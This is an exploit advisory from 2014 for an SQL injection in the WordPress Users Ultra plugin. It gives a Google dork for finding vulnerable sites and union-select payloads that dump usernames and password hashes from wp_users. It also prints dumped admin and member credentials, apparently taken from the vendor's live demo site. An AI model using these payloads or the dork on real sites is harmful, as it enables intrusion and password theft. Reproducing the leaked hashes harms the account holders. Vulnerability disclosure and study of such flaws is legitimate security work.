################################################################################################# # Title : Wordpress Users Ultra Plugin - SQL injection Vulnerability # Risk : High+/Critical # Author : XroGuE # Google Dork : inurl: wp-content/plugins/users-ultra/ # Plugin Version : 1.3.37 # Plugin Name : users ultra # Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip # Vendor Home : http://www.usersultra.com/ # Date : 2014/09/27 # Tested in : Win7 - Linux ################################################################################################## # Description: # This Vulnerability Available in Both Version of This Plugin (Free & Pro Version). # You need To Login As member and Send Or Recive a Message To Get A Message ID To Inject it. # The Vendor Demo Has This Vulnerability,Check it at This Link: http://usersultra.com/uultra-testing/ # # PoC : # # http://localhost/wp/?page_id=117&module=messages&view=[id] # # Proof : # # http://www.aparat.com/v/vNI81 # http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/ # ################################################################################################## # # Demo : # # http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users-- # => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1 # # # http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users-- # => Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1 # ################################################################################################## # # Discovered By : XroGuE # Website : http://www.Att4ck3r.ir # E-Mail : info[at]att4ck3r[Dot]ir # ##################################################################################################